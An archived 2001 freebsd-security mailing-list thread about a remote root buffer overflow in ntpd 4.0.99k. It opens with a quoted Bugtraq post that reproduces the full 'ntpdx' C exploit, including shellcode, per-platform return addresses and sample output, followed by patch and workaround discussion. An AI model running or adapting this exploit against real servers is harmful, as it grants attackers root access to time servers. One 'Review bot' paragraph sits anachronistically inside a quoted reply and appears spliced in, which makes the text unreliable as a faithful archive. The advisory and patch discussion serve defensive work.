> >From: Przemyslaw Frasunek > >Subject: ntpd =< 4.0.99k remote buffer overflow > >To: BUGTRAQ@SECURITYFOCUS.COM > > > >/* ntpd remote root exploit / babcia padlina ltd. */ > > > >/* > > * Network Time Protocol Daemon (ntpd) shipped with many systems is vulnerab le > > * to remote buffer overflow attack. It occurs when building response for > > * a query with large readvar argument. In almost all cases, ntpd is running > > * with superuser privileges, allowing to gain REMOTE ROOT ACCESS to timeser ver. > > * > > * Althought it's a normal buffer overflow, exploiting it is much harder. > > * Destination buffer is accidentally damaged, when attack is performed, so > > * shellcode can't be larger than approx. 70 bytes. This proof of concept co de > > * uses small execve() shellcode to run /tmp/sh binary. Full remote attack > > * is possible. > > * > > * NTP is stateless UDP based protocol, so all malicious queries can be > > * spoofed. > > * > > * Example of use on generic RedHat 7.0 box: > > * > > * [venglin@cipsko venglin]$ cat dupa.c > > * main() { setreuid(0,0); system("chmod 4755 /bin/sh"); } > > * [venglin@cipsko venglin]$ cc -o /tmp/sh dupa.c > > * [venglin@cipsko venglin]$ cc -o ntpdx ntpdx.c > > * [venglin@cipsko venglin]$ ./ntpdx -t2 localhost > > * ntpdx v1.0 by venglin@freebsd.lublin.pl > > * > > * Selected platform: RedHat Linux 7.0 with ntpd 4.0.99k-RPM (/tmp/sh) > > * > > * RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query > > * [1] <- evil query (pkt = 512 | shell = 45) > > * [2] <- null query (pkt = 12) > > * Done. > > * /tmp/sh was spawned. 
> > * [venglin@cipsko venglin]$ ls -al /bin/bash > > * -rwsr-xr-x 1 root root 512540 Aug 22 2000 /bin/bash > > * > > */ > > > >#include > >#include > >#include > >#include > >#include > >#include > >#include > >#include > >#include > >#include > > > >#define NOP 0x90 > >#define ADDRS 8 > >#define PKTSIZ 512 > > > >static char usage[] = "usage: ntpdx [-o offset] <-t type> "; > > > >/* generic execve() shellcodes */ > > > >char lin_execve[] = > > "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" > > "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" > > "\x80\xe8\xdc\xff\xff\xff/tmp/sh"; > > > >char bsd_execve[] = > > "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f" > > "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52" > > "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/sh\x01\x01\x01\x01" > > "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04"; > > > >struct platforms > >{ > > char *os; > > char *version; > > char *code; > > long ret; > > int align; > > int shalign; > > int port; > >}; > > > >/* Platforms. Notice, that on FreeBSD shellcode must be placed in packet > > * *after* RET address. This values will vary from platform to platform. 
> > */ > > > >struct platforms targ[] = > >{ > > { "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve, > > 0xbfbff8bc, 200, 220, 0 }, > > > > { "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve, > > 0xbfbff540, 200, 220, 0 }, > > > > { "RedHat Linux 7.0", "4.0.99k-RPM (/tmp/sh)", lin_execve, > > 0xbffff777, 240, 160, 0 }, > > > > { NULL, NULL, NULL, 0x0, 0, 0, 0 } > >}; > > > >long getip(name) > >char *name; > >{ > > struct hostent *hp; > > long ip; > > extern int h_errno; > > > > if ((ip = inet_addr(name)) < 0) > > { > > if (!(hp = gethostbyname(name))) > > { > > fprintf(stderr, "gethostbyname(): %s\n", > > strerror(h_errno)); > > exit(1); > > } > > memcpy(&ip, (hp->h_addr), 4); > > } > > > > return ip; > >} > > > >int doquery(host, ret, shellcode, align, shalign) > >char *host, *shellcode; > >long ret; > >int align, shalign; > >{ > > /* tcpdump-based reverse engineering :)) */ > > > > char q2[] = { 0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, > > 0x00, 0x00, 0x01, 0x36, 0x73, 0x74, 0x72, 0x61, > > 0x74, 0x75, 0x6d, 0x3d }; > > > > char q3[] = { 0x16, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, > > 0x00, 0x00, 0x00, 0x00 }; > > > > char buf[PKTSIZ], *p; > > long *ap; > > int i; > > > > int sockfd; > > struct sockaddr_in sa; > > > > bzero(&sa, sizeof(sa)); > > > > sa.sin_family = AF_INET; > > sa.sin_port = htons(123); > > sa.sin_addr.s_addr = getip(host); > > > > if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) > > { > > perror("socket"); > > return -1; > > } > > > > if((connect(sockfd, (struct sockaddr *)&sa, sizeof(sa))) < 0) > > { > > perror("connect"); > > close(sockfd); > > return -1; > > } > > > > memset(buf, NOP, PKTSIZ); > > memcpy(buf, q2, sizeof(q2)); > > > > p = buf + align; > > ap = (unsigned long *)p; > > > > for(i=0;i > *ap++ = ret; > > > > p = (char *)ap; > > > > memcpy(buf+shalign, shellcode, strlen(shellcode)); > > > > if((write(sockfd, buf, PKTSIZ)) < 0) > > { > > perror("write"); > > close(sockfd); > > return -1; > > } > > > > 
fprintf(stderr, "[1] <- evil query (pkt = %d | shell = %d)\n", PKTSIZ, > > strlen(shellcode)); > > fflush(stderr); > > > > if ((write(sockfd, q3, sizeof(q3))) < 0) > > { > > perror("write"); > > close(sockfd); > > return -1; > > } > > > > fprintf(stderr, "[2] <- null query (pkt = %d)\n", sizeof(q3)); > > fflush(stderr); > > > > close(sockfd); > > > return 0; > >} > > > >int main(argc, argv) > >int argc; > >char **argv; > >{ > > extern int optind, opterr; > > extern char *optarg; > > int ch, type, ofs, i; > > long ret; > > > > opterr = ofs = 0; > > type = -1; > > > > while ((ch = getopt(argc, argv, "t:o:")) != -1) > > switch((char)ch) > > { > > case 't': > > type = atoi(optarg); > > break; > > > > case 'o': > > ofs = atoi(optarg); > > break; > > > > case '?': > > default: > > puts(usage); > > exit(0); > > > > } > > > > argc -= optind; > > argv += optind; > > > > fprintf(stderr, "ntpdx v1.0 by venglin@freebsd.lublin.pl\n\n"); > > > > if (type < 0) > > { > > fprintf(stderr, "Please select platform:\n"); > > for (i=0;targ[i].os;i++) > > { > > fprintf(stderr, "\t-t %d : %s %s (%p)\n", i, > > targ[i].os, targ[i].version, (void *)targ[i].ret); > > } > > > > exit(0); > > } > > > > fprintf(stderr, "Selected platform: %s with ntpd %s\n\n", > > targ[type].os, targ[type].version); > > > > ret = targ[type].ret; > > ret += ofs; > > > > if (argc != 1) > > { > > puts(usage); > > exit(0); > > } > > > > fprintf(stderr, "RET: %p / Align: %d / Sh-align: %d / sending query\n", > > (void *)ret, targ[type].align, targ[type].shalign); > > > > if (doquery(*argv, ret, targ[type].code, targ[type].align, > > targ[type].shalign) < 0) > > { > > fprintf(stderr, "Failed.\n"); > > exit(1); > > } > > > > fprintf(stderr, "Done.\n"); > > > > if (!targ[type].port) > > { > > fprintf(stderr, "/tmp/sh was spawned.\n"); > > exit(0); > > } > > > > exit(0); > >} > > > >-- > >* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE * > >* Inet: przemyslaw@frasunek.com ** PGP: 
D48684904685DF43EA93AFA13BE170BF * > > > >To Unsubscribe: send mail to majordomo@FreeBSD.org > >with "unsubscribe freebsd-security" in the body of the message > > > > -- > Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 > phk@FreeBSD.ORG | TCP/IP since RFC 956 > FreeBSD committer | BSD since 4.3-tahoe > Never attribute to malice what can adequately be explained by incompetence. > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > --==_Exmh_854596055P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: Exmh version 2.3.1 01/18/2001 iD8DBQE6y7frLTFEeF+CsrMRAn2cAKCC6wGNaadWF6M1sDe7TGCCfhZBWwCfeqsA sBiyDxYcx+M87S5Q0oI/nPw= =IrKX -----END PGP SIGNATURE----- --==_Exmh_854596055P-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 17:14:26 2001 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id 7AB2A37B43F for ; Wed, 4 Apr 2001 17:14:22 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.3/8.11.3) with ESMTP id f350E8t52877; Thu, 5 Apr 2001 02:14:08 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Eli Dart Cc: freebsd-security@FreeBSD.ORG, pat@databits.net Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow In-Reply-To: Your message of "Wed, 04 Apr 2001 17:10:19 PDT." <20010405001019.935A027@usul.nersc.gov> Date: Thu, 05 Apr 2001 02:14:08 +0200 Message-ID: <52875.986429648@critter> 
From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20010405001019.935A027@usul.nersc.gov>, Eli Dart writes: >--==_Exmh_854596055P >Content-Type: text/plain; charset=us-ascii > >Any chance these changes could be propagated to the port? It's still >4.0.99k as of 5 minutes ago....ipf rules work in some cases, but not >all...... Sure, pull the patch out of the cvs tree: http://www.freebsd.org/cgi/cvsweb.cgi/src/contrib/ntp/ntpd/ntp_control.c.diff?r1=1.1&r2=1.2 It should apply with no problems.... I have to hit the hay now, so somebody else gets to do the honours... -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 17:14:50 2001 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 3034037B446 for ; Wed, 4 Apr 2001 17:14:48 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id SAA10418; Wed, 4 Apr 2001 18:14:42 -0600 (MDT) Message-Id: <4.3.2.7.2.20010404181106.044485d0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 04 Apr 2001 18:14:37 -0600 To: Michael Bryan , freebsd-security@FreeBSD.ORG 
From: Brett Glass Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow In-Reply-To: <3ACBB263.2804E9C2@ursine.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Workaround: Use /usr/sbin/ntpdate -s time.nist.gov (or pick your favorite server) periodically from /etc/crontab. (Once a day, at an odd hour and minute of the morning, is sufficient for most machines.) This is what we have always done. It reduces overhead because there isn't a daemon constantly running. --Brett At 05:46 PM 4/4/2001, Michael Bryan wrote: >Heads up. This just came across BugTraq, will likely affect FreeBSD. >As of 4.2-RELEASE, the ntpd that ships with FreeBSD is 4.0.99b. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 17:16:32 2001 Delivered-To: freebsd-security@freebsd.org Received: from mailhub.airlinksys.com (mailhub.airlinksys.com [216.70.12.6]) by hub.freebsd.org (Postfix) with ESMTP id EB40F37B43E for ; Wed, 4 Apr 2001 17:16:27 -0700 (PDT) (envelope-from sjohn@airlinksys.com) Received: from ns2.airlinksys.com (ns2.airlinksys.com [216.70.12.3]) by mailhub.airlinksys.com (Postfix) with ESMTP id 417B353501 for ; Wed, 4 Apr 2001 19:16:27 -0500 (CDT) Received: by ns2.airlinksys.com (Postfix, from userid 1000) id 733BC5DA8; Wed, 4 Apr 2001 19:16:26 -0500 (CDT) Date: Wed, 4 Apr 2001 19:16:26 -0500 
From: Scott Johnson To: freebsd-security@FreeBSD.ORG Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow Message-ID: <20010404191626.A6071@ns2.airlinksys.com> Reply-To: Scott Johnson Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <3ACBB263.2804E9C2@ursine.com> <52565.986428557@critter> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <52565.986428557@critter>; from phk@critter.freebsd.dk on Thu, Apr 05, 2001 at 01:55:57AM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Quoth Poul-Henning Kamp on Thu, Apr 05, 2001 at 01:55:57AM +0200: > > This has already been fixed in FreeBSD current & stable an hour > ago or so. > > Poul-Henning Is a patch coming for 4.2-RELEASE? Will we just have to install the port over our system binaries, like we did with bind? In that case, it appears that just setting PREFIX=/usr won't do to overwrite the system version, since the port puts its binaries in ${PREFIX}/bin. -- Scott Johnson System/Network Administrator Airlink Systems To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 17:17: 4 2001 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id D6B0D37B446 for ; Wed, 4 Apr 2001 17:16:59 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.3/8.11.3) with ESMTP id f350Gpt52944; Thu, 5 Apr 2001 02:16:51 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Brett Glass Cc: Michael Bryan , freebsd-security@FreeBSD.ORG Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow In-Reply-To: Your message of "Wed, 04 Apr 2001 18:14:37 MDT." 
<4.3.2.7.2.20010404181106.044485d0@localhost> Date: Thu, 05 Apr 2001 02:16:51 +0200 Message-ID: <52942.986429811@critter> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <4.3.2.7.2.20010404181106.044485d0@localhost>, Brett Glass writes: >Workaround: Use > >/usr/sbin/ntpdate -s time.nist.gov (or pick your favorite server) > >periodically from /etc/crontab. (Once a day, at an odd hour and >minute of the morning, is sufficient for most machines.) This >is what we have always done. It reduces overhead because there >isn't a daemon constantly running. And it has a lot worse performance, but let's not get into that... -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 17:19:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by hub.freebsd.org (Postfix) with ESMTP id 8623C37B424 for ; Wed, 4 Apr 2001 17:19:53 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.3/8.11.3) with ESMTP id f350Jgt52983; Thu, 5 Apr 2001 02:19:42 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Scott Johnson Cc: freebsd-security@FreeBSD.ORG Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow In-Reply-To: Your message of "Wed, 04 Apr 2001 19:16:26 CDT." <20010404191626.A6071@ns2.airlinksys.com> Date: Thu, 05 Apr 2001 02:19:41 +0200 Message-ID: <52981.986429981@critter> 
From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <20010404191626.A6071@ns2.airlinksys.com>, Scott Johnson writes: >Quoth Poul-Henning Kamp on Thu, Apr 05, 2001 at 01:55:57AM +0200: >> >> This has already been fixed in FreeBSD current & stable an hour >> ago or so. >> >> Poul-Henning > >Is a patch coming for 4.2-RELEASE? Will we just have to install the port >over our system binaries, like we did with bind? In that case, it appears >that just setting PREFIX=/usr won't do to overwrite the system version, >since the port puts its binaries in ${PREFIX}/bin. The patch should apply to pretty much any version of (x)ntpd so please help yourself while I get some sleep. The patch is here: http://www.freebsd.org/cgi/cvsweb.cgi/src/contrib/ntp/ntpd/ntp_control.c.diff?r1=1.1&r2=1.2 -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. 
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 17:25:58 2001 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id C270C37B424 for ; Wed, 4 Apr 2001 17:25:53 -0700 (PDT) (envelope-from Cy.Schubert@uumail.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id RAA22002; Wed, 4 Apr 2001 17:25:09 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda21994; Wed Apr 4 17:24:57 2001 Received: (from uucp@localhost) by passer.osg.gov.bc.ca (8.11.2/8.9.1) id f350OqR25629; Wed, 4 Apr 2001 17:24:52 -0700 (PDT) Received: from cwsys9.cwsent.com(10.2.2.1), claiming to be "cwsys.cwsent.com" via SMTP by passer9.cwsent.com, id smtpdz25625; Wed Apr 4 17:24:20 2001 Received: (from uucp@localhost) by cwsys.cwsent.com (8.11.3/8.9.1) id f350OKC50297; Wed, 4 Apr 2001 17:24:20 -0700 (PDT) Message-Id: <200104050024.f350OKC50297@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdY50142; Wed Apr 4 17:23:21 2001 X-Mailer: exmh version 2.3.1 01/18/2001 with nmh-1.0.4 Reply-To: Cy Schubert - ITSD Open Systems Group 
From: Cy Schubert - ITSD Open Systems Group X-Sender: schubert To: Poul-Henning Kamp Cc: Eli Dart , freebsd-security@FreeBSD.ORG, pat@databits.net Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow In-reply-to: Your message of "Thu, 05 Apr 2001 02:14:08 +0200." <52875.986429648@critter> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 04 Apr 2001 17:23:21 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <52875.986429648@critter>, Poul-Henning Kamp writes: > In message <20010405001019.935A027@usul.nersc.gov>, Eli Dart writes: > >--==_Exmh_854596055P > >Content-Type: text/plain; charset=us-ascii > > > >Any chance these changes could be propagated to the port? It's still > >4.0.99k as of 5 minutes ago....ipf rules work in some cases, but not > >all...... > > Sure, pull the patch out of the cvs tree: > > http://www.freebsd.org/cgi/cvsweb.cgi/src/contrib/ntp/ntpd/ntp_control. > c.diff?r1=1.1&r2=1.2 > > It should apply with no problems.... > > I have to hit the hay now, so somebody else gets to do the honours... I've got a 4.0.99k port with the patch ready to go. Who can I send to get committed? Been using it, sans the security patch of course, since November -- well tested. 
Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca Open Systems Group, ITSD, ISTA Province of BC To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 17:27:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from faith.cs.utah.edu (faith.cs.utah.edu [155.99.198.108]) by hub.freebsd.org (Postfix) with ESMTP id EC23937B616 for ; Wed, 4 Apr 2001 17:27:07 -0700 (PDT) (envelope-from danderse@cs.utah.edu) Received: (from danderse@localhost) by faith.cs.utah.edu (8.9.3/8.9.3) id SAA17343; Wed, 4 Apr 2001 18:26:46 -0600 (MDT) Message-Id: <200104050026.SAA17343@faith.cs.utah.edu> Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow To: phk@critter.freebsd.dk (Poul-Henning Kamp) Date: Wed, 4 Apr 2001 18:26:46 -0600 (MDT) Cc: sjohn@airlinksys.com (Scott Johnson), freebsd-security@FreeBSD.ORG In-Reply-To: <52981.986429981@critter> from "Poul-Henning Kamp" at Apr 05, 2001 02:19:41 AM From: "David G. Andersen" X-Mailer: ELM [version 2.5 PL2] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org It doesn't go cleanly to my 4.2-STABLE I stripped out the inessential bits of the patch: diff -u -r1.1.1.2 ntp_control.c --- ntp_control.c 2000/01/28 14:53:03 1.1.1.2 +++ ntp_control.c 2001/04/05 00:26:04 
@@ -1649,8 +1649,20 @@ tp = buf; while (cp < reqend && isspace((int)*cp)) cp++; - while (cp < reqend && *cp != ',') + while (cp < reqend && *cp != ',') { *tp++ = *cp++; + if (tp > buf + sizeof(buf)) { + msyslog(LOG_WARNING, "Attempted \"ntpdx\" exploit from IP %d.%d.%d.%d:%d (possibly spoofed)\n", + (ntohl(rmt_addr->sin_addr.s_addr) >> 24) & 0xff, + (ntohl(rmt_addr->sin_addr.s_addr) >> 16) & 0xff, + (ntohl(rmt_addr->sin_addr.s_addr) >> 8) & 0xff, + (ntohl(rmt_addr->sin_addr.s_addr) >> 0) & 0xff, + ntohs(rmt_addr->sin_port) + ); + + return (0); + } + } Probably won't make a difference to most. --Dave Lo and behold, Poul-Henning Kamp once said: > > In message <20010404191626.A6071@ns2.airlinksys.com>, Scott Johnson writes: > >Quoth Poul-Henning Kamp on Thu, Apr 05, 2001 at 01:55:57AM +0200: > >> > >> This has already been fixed in FreeBSD current & stable an hour > >> ago or so. > >> > >> Poul-Henning > > > >Is a patch coming for 4.2-RELEASE? Will we just have to install the port > >over our system binaries, like we did with bind? In that case, it appears > >that just setting PREFIX=/usr won't do to overwrite the system version, > >since the port puts its binaries in ${PREFIX}/bin. > > The patch should apply to pretty much any version of (x)ntpd so please > help yourself while I get some sleep. > > The patch is here: > > http://www.freebsd.org/cgi/cvsweb.cgi/src/contrib/ntp/ntpd/ntp_control.c.diff?r1=1.1&r2=1.2 > > -- > Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 > phk@FreeBSD.ORG | TCP/IP since RFC 956 > FreeBSD committer | BSD since 4.3-tahoe > Never attribute to malice what can adequately be explained by incompetence. 
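Review bot: In the `@@ -1649,8 +1649,20 @@` hunk the bounds test runs after the store and uses `>`, so by the time `tp > buf + sizeof(buf)` becomes true, `*tp++ = *cp++` has already written `buf[sizeof(buf)]`, one byte past the end of the buffer. Test before storing and leave room for the terminator, for example `if (tp >= buf + sizeof(buf) - 1)` ahead of the copy, then log and `return (0)` as the hunk already does. The "(possibly spoofed)" wording in the log message is worth keeping, since the address being printed comes straight from `rmt_addr`.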
> > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > -- work: dga@lcs.mit.edu me: dga@pobox.com MIT Laboratory for Computer Science http://www.angio.net/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 17:30:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from lariat.org (lariat.org [12.23.109.2]) by hub.freebsd.org (Postfix) with ESMTP id 256F337B446 for ; Wed, 4 Apr 2001 17:30:34 -0700 (PDT) (envelope-from brett@lariat.org) Received: from mustang.lariat.org (IDENT:ppp0.lariat.org@lariat.org [12.23.109.2]) by lariat.org (8.9.3/8.9.3) with ESMTP id SAA10599; Wed, 4 Apr 2001 18:30:10 -0600 (MDT) Message-Id: <4.3.2.7.2.20010404181852.04445ed0@localhost> X-Sender: brett@localhost X-Mailer: QUALCOMM Windows Eudora Version 4.3.2 Date: Wed, 04 Apr 2001 18:30:07 -0600 To: Poul-Henning Kamp 
From: Brett Glass Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow Cc: Michael Bryan , freebsd-security@FreeBSD.ORG In-Reply-To: <52942.986429811@critter> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org At 06:16 PM 4/4/2001, Poul-Henning Kamp wrote: >And it has a lot worse performance, but let's not get into that... You're right, actually; it has worse performance if you're updating your clocks frequently. If you're checking once a day (we just do it as routine maintenance along with the nightly automated backup), it's probably more efficient. The point is that it's something you can put in right away until you patch or upgrade to 4.3-RELEASE. --Brett To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 18:57: 8 2001 Delivered-To: freebsd-security@freebsd.org Received: from cowpie.acm.vt.edu (cowpie.acm.vt.edu [128.173.42.253]) by hub.freebsd.org (Postfix) with ESMTP id 8614A37B496 for ; Wed, 4 Apr 2001 18:57:05 -0700 (PDT) (envelope-from dlacroix@cowpie.acm.vt.edu) Received: (from dlacroix@localhost) by cowpie.acm.vt.edu (8.11.3/8.11.3) id f351uiq20419; Wed, 4 Apr 2001 21:56:44 -0400 (EDT) (envelope-from dlacroix) 
From: David La Croix Message-Id: <200104050156.f351uiq20419@cowpie.acm.vt.edu> Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow To: fbsd-secure@ursine.com (Michael Bryan) Date: Wed, 4 Apr 2001 20:56:44 -0500 (CDT) Cc: freebsd-security@FreeBSD.ORG In-Reply-To: from "Michael Bryan" at Apr 04, 2001 04:46:43 PM X-Mailer: ELM [version 2.5 PL5] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > > Heads up. This just came across BugTraq, will likely affect FreeBSD. > As of 4.2-RELEASE, the ntpd that ships with FreeBSD is 4.0.99b. > > Haven't seen anybody mention this yet.... (and I hate to admit to still using 3.x) I have a production box which I haven't upgraded yet... Is the version of xntpd in 3.x-STABLE (xntpdc version=3.4e) susceptible to this, or any other, known buffer overflows? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Apr 4 19: 9: 9 2001 Delivered-To: freebsd-security@freebsd.org Received: from nsmail.corp.globalstar.com (gibraltar.globalstar.com [207.88.248.142]) by hub.freebsd.org (Postfix) with ESMTP id 1190A37B443 for ; Wed, 4 Apr 2001 19:09:07 -0700 (PDT) (envelope-from crist.clark@globalstar.com) Received: from globalstar.com ([207.88.153.184]) by nsmail.corp.globalstar.com (Netscape Messaging Server 4.15) with ESMTP id GBARAN00.D93; Wed, 4 Apr 2001 19:08:47 -0700 Message-ID: <3ACBD3BF.52BF23E6@globalstar.com> Date: Wed, 04 Apr 2001 19:09:03 -0700 
From: "Crist Clark" Organization: Globalstar LP X-Mailer: Mozilla 4.77 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: David La Croix Cc: Michael Bryan , freebsd-security@FreeBSD.ORG Subject: Re: Fwd: ntpd =< 4.0.99k remote buffer overflow References: <200104050156.f351uiq20419@cowpie.acm.vt.edu> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org David La Croix wrote: > > > > > > > Heads up. This just came across BugTraq, will likely affect FreeBSD. > > As of 4.2-RELEASE, the ntpd that ships with FreeBSD is 4.0.99b. > > > > > > Haven't seen anybody mention this yet.... (and I hate to admit to > still using 3.x) I have a production box which I haven't upgraded yet... > > Is the version of xntpd in 3.x-STABLE (xntpdc version=3.4e) > susceptible to this, or any other, known buffer overflows? Test it. If you compile the code and shoot, it will crash the daemon even if the exploit is not successful. But that tells you the potential is there. I took that FreeBSD and Linux exploit and aimed it at Sparc box running xntpd 3.4y and *CRASH*. The xntpd cored and died. The buffer overrun looks like it goes back at least that far. It should not be too hard to track it to the source. But I am too busy trying to assess how to handle all the machines I _know_ are vulnerable to do that. The idea that something like the NTP built in to Cisco's IOS might be based off of vulnerable [x]ntpd code frankly scares the beejeezus out of me. -- Crist J. Clark Network Security Engineer crist.clark@globalstar.com Globalstar, L.P. (408) 933-4387 FAX: (408) 933-4926 The information contained in this e-mail message is confidential, intended only for the use of the individual or entity named above. 
